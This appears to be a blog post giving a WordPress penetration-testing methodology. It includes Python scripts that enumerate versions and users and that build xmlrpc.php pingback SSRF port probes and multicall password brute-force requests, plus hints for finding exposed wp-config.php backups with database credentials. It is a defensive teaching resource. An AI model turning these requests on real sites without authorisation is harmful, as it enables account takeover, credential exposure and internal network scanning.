
What is your methodology and approach when testing a web application which is using Wordpress?

Before moving on to the approach for testing a WordPress website, let's define what WordPress is. WordPress is a widely used, open-source content management system (CMS) for creating and managing websites and blogs. It is built on PHP and uses a MySQL (or MariaDB) database to store content and configuration settings. Core is extended by third-party plugins and themes, which is where most WordPress vulnerabilities are found in practice.


A simple penetration testing methodology against a WordPress website is as follows:


  • Reconnaissance or ‘recon’: gather information about the application and map the functionality of the website, using tools such as Wappalyzer and WPintel to identify the WordPress version, the theme and the installed plugins.

  • Scanning: scan for vulnerabilities and record each finding in a document together with a severity level. This can be done with WordPress penetration testing tools such as Nmap, FFuF, Nuclei and WPScan.

  • Test cases: prepare test cases that match the functionality of the website (login, registration, comments, search, file upload, plugin-specific features) and test each one for vulnerabilities.

  • Exploitation: perform this step only if it is within the scope of the engagement and explicit permission has been granted.

  • Recommendation and reporting: report the vulnerabilities found, ordered from highest to lowest severity, with a recommended mitigation for each.


Tool or Automated Approach:


  • Wappalyzer: a browser extension that identifies the technologies behind a website, including WordPress itself and, often, the theme and visible plugins.

  • WPintel: a browser extension that scans self-hosted WordPress sites and reveals version details, known vulnerabilities, plugins, themes, user information and more.

  • Nmap: used to scan the host for open ports, service versions and the operating system; with NSE scripts such as http-wordpress-enum it can also enumerate WordPress plugins and themes and flag potential vulnerabilities.

  • FFuF: a fast web fuzzer used to brute-force directories and file names, uncovering sensitive or forgotten files such as info.php, backup copies of wp-config.php, or plugin directories that are not linked from the site.

  • WPScan: a widely used security scanner built specifically for WordPress, and a staple for both site owners and security professionals. It detects the WordPress version, enumerates installed themes and plugins with their versions, enumerates users, checks for exposed database export files and configuration backups, and looks up publicly known vulnerabilities (with CVE references) through the WPScan vulnerability database API. It can also run password brute-force attacks against wp-login.php and xmlrpc.php, and its JSON output can be fed into other tools.
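As an added example (not code from the original post or from any of the tools listed above), the following Python script shows what the version detection and user enumeration those tools automate actually look at. The HTML, JSON and redirect target below are constructed sample responses standing in for what a site would return; example.test is a placeholder host and nothing is fetched from the network.

```python
"""Added example, not code from the original post or from any listed tool.
Shows what WordPress version detection and user enumeration look at.
All inputs below are constructed sample responses; nothing is fetched."""
import json
import re
from typing import Optional

# Constructed sample responses (example.test is a placeholder host)
SAMPLE_README = """<!DOCTYPE html>
<html><head><title>WordPress &rsaquo; ReadMe</title></head>
<body>
<h1 id="logo"><a href="https://wordpress.org/"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /></a>
<br /> Version 6.4.2
</h1>"""

SAMPLE_HOME_META = (
    '<html><head><meta name="generator" content="WordPress 6.4.2" />'
    '</head><body></body></html>'
)

SAMPLE_HOME_ASSET_ONLY = (
    '<html><head><link rel="stylesheet" '
    'href="https://example.test/wp-includes/css/dist/block-library/style.min.css?ver=6.4.2" />'
    '</head><body></body></html>'
)

SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://example.test/author/admin/"},
    {"id": 3, "name": "Jane Editor", "slug": "jane", "link": "https://example.test/author/jane/"},
])

SAMPLE_AUTHOR_REDIRECT = "https://example.test/author/admin/"  # Location header for GET /?author=1

_VERSION = r"(\d+\.\d+(?:\.\d+)?)"


def version_from_readme(html: str) -> Optional[str]:
    """readme.html prints 'Version X.Y.Z' under the logo unless hardening removed the file."""
    m = re.search(r"Version\s+" + _VERSION, html)
    return m.group(1) if m else None


def version_from_page(html: str) -> Optional[str]:
    """Any page: the generator meta tag first, then the ?ver= suffix on core assets under wp-includes/."""
    m = re.search(r'<meta name="generator" content="WordPress ' + _VERSION, html)
    if m:
        return m.group(1)
    m = re.search(r"/wp-includes/[^\"'\s]+\?ver=" + _VERSION, html)
    return m.group(1) if m else None


def users_from_rest(body: str) -> list[str]:
    """/wp-json/wp/v2/users lists users with published content; slug is usually the login name."""
    return [user["slug"] for user in json.loads(body)]


def user_from_author_redirect(location: str) -> Optional[str]:
    """/?author=N redirects to /author/<user_nicename>/ when a user with that ID exists."""
    m = re.search(r"/author/([^/?#]+)/?", location)
    return m.group(1) if m else None


def recon_summary(readme: str, home: str, users_json: str, author_redirect: str) -> dict:
    """Combine the checks and de-duplicate the user names found."""
    users = users_from_rest(users_json)
    redirected = user_from_author_redirect(author_redirect)
    if redirected and redirected not in users:
        users.append(redirected)
    return {
        "version": version_from_readme(readme) or version_from_page(home),
        "users": users,
    }


if __name__ == "__main__":
    print(recon_summary(SAMPLE_README, SAMPLE_HOME_META, SAMPLE_USERS_JSON, SAMPLE_AUTHOR_REDIRECT))
```

In a live test each function would be fed the body (or the Location header) of a real response; the point of keeping several sources for the version is that hardening plugins usually remove readme.html and the generator tag but rarely strip the ?ver= suffix from core assets.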


Manual Approach:


  • Check for user enumeration. By default, WordPress exposes the REST endpoint /wp-json/wp/v2/users, which lists every user who has published content; the slug field is usually the login name. The author archive leaks the same information: a request to /?author=1 redirects to /author/<username>/ when that user ID exists.


  • Check whether xmlrpc.php is enabled: a GET request to it answers “XML-RPC server accepts POST requests only.”, and a POST calling system.listMethods lists the exposed methods.

  • Check for the common abuses of xmlrpc.php: password brute force through wp.getUsersBlogs (many attempts wrapped in one system.multicall request) and cross-site port attack (XSPA, a form of SSRF) through the pingback.ping method, which makes the server fetch an attacker-supplied source URL.

  • Prepare test cases and run them: check for SQL injection, XSS, command injection, XXE and other injection vulnerabilities in every input parameter of the website, including the ones added by plugins (search, comment and contact forms, admin-ajax.php actions).

  • Check for authentication and authorization issues such as weak passwords, login bypass, 2FA/MFA bypass, IDOR, CAPTCHA bypass, etc.

  • Check for session-related vulnerabilities such as session hijacking, missing session invalidation on logout or password change, reuse of session tokens, session expiration issues and more.

  • Check the main WordPress files and folders: index.php; readme.html, which reveals the installed WordPress version; license.txt, whose copyright year range hints at the release; and wp-activate.php, which handles the e-mail activation step when a new site is set up.

  • Login paths: /wp-login.php is the default login page and /wp-admin/ redirects unauthenticated users to it; some sites also expose aliases such as /login.php. wp-content/ is the main directory where plugins, themes and uploads are stored; check whether directory listing is enabled on wp-content/plugins/ and wp-content/uploads/.

  • wp-includes/ is the directory of core files such as certificates, fonts, JavaScript files and widgets. wp-sitemap.xml at the site root (WordPress 5.5 and later) lists public posts, pages and author archives, which makes it another source of user names.

  • Check wp-config.php, which contains the information WordPress needs to connect to the database: the database name, host, username and password, the authentication keys and salts, and the table prefix. It also controls debug mode (WP_DEBUG, WP_DEBUG_DISPLAY), which is useful for troubleshooting but leaks file paths and error details if left on in production. The file itself is executed as PHP and returns an empty page, so look for editor and backup copies (wp-config.php.bak, wp-config.php~, wp-config.php.save, wp-config.php.swp, wp-config.txt) that the web server serves as plain text.

  • Check /wp-cron.php: it runs scheduled tasks on every request and is reachable without authentication, so a flood of requests to it can cause a DoS. The usual mitigation is to set DISABLE_WP_CRON and trigger it from a system cron job instead.
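The two xmlrpc.php checks above (pingback.ping for XSPA and system.multicall for brute force), as an added example that is not code from the original post: the script builds the request bodies with Python's standard xmlrpc.client and interprets constructed sample responses offline. The target URLs are placeholders and nothing is sent over the network.

```python
"""Added example, not code from the original post. Builds the two xmlrpc.php
requests discussed above and interprets constructed sample responses offline.
The target URLs are placeholders; nothing is sent over the network."""
import xmlrpc.client

TARGET_POST = "https://example.test/?p=1"   # assumed: an existing, pingback-enabled post


def pingback_request(source_url: str, target_post: str = TARGET_POST) -> bytes:
    """Body for pingback.ping. The server fetches source_url and looks for a link
    back to target_post; pointing source_url at an internal host:port makes the
    server probe that port for you (XSPA / SSRF)."""
    return xmlrpc.client.dumps((source_url, target_post), methodname="pingback.ping").encode()


def multicall_login_request(username: str, passwords: list[str]) -> bytes:
    """One HTTP request carrying many wp.getUsersBlogs authentication attempts."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def classify_pingback_response(body: str) -> str:
    """Map the fault code WordPress returns from pingback.ping to what it tells the tester."""
    try:
        xmlrpc.client.loads(body)
        return "accepted"            # source fetched and it linked back: pingback stored
    except xmlrpc.client.Fault as fault:
        return {
            16: "unreachable",       # 'The source URL does not exist.': the fetch failed
            17: "reachable",         # '...does not contain a link to the target URL': fetch succeeded
            33: "bad-target",        # target is not an existing, pingback-enabled post
            48: "already-registered",
        }.get(fault.faultCode, f"other:{fault.faultCode}")


def passwords_accepted(body: str, passwords: list[str]) -> list[str]:
    """system.multicall returns one entry per call: a fault struct for a failed
    login, an array holding the blog list for a successful one."""
    (results,), _ = xmlrpc.client.loads(body)
    return [pw for pw, result in zip(passwords, results)
            if not (isinstance(result, dict) and "faultCode" in result)]


# Constructed sample responses, serialised with dumps() so they are valid XML-RPC
def _fault_response(code: int, message: str) -> str:
    return xmlrpc.client.dumps(xmlrpc.client.Fault(code, message))


SAMPLE_PORT_OPEN = _fault_response(
    17, "The source URL does not contain a link to the target URL, and so cannot be used as a source.")
SAMPLE_PORT_CLOSED = _fault_response(16, "The source URL does not exist.")
SAMPLE_ACCEPTED = xmlrpc.client.dumps(("Pingback registered.",), methodresponse=True)
SAMPLE_WORDLIST = ["password", "admin123", "Winter2024!"]
SAMPLE_MULTICALL = xmlrpc.client.dumps(([
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    [[{"blogid": "1", "blogName": "Example", "url": "https://example.test/", "isAdmin": True}]],
],), methodresponse=True)


if __name__ == "__main__":
    print(pingback_request("http://10.0.0.5:8080/").decode())
    print(classify_pingback_response(SAMPLE_PORT_OPEN), classify_pingback_response(SAMPLE_PORT_CLOSED))
    print(passwords_accepted(SAMPLE_MULTICALL, SAMPLE_WORDLIST))
```

Two caveats when running this for real: pingback.ping needs a genuine post URL as the target (otherwise every probe returns fault 33 regardless of the source), and WordPress 4.4 and later reject the remaining login attempts in a system.multicall once the first one fails, so the brute-force amplification mostly works against old or oddly configured installs. The port-open/port-closed distinction from the fault string is still reliable on current versions.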

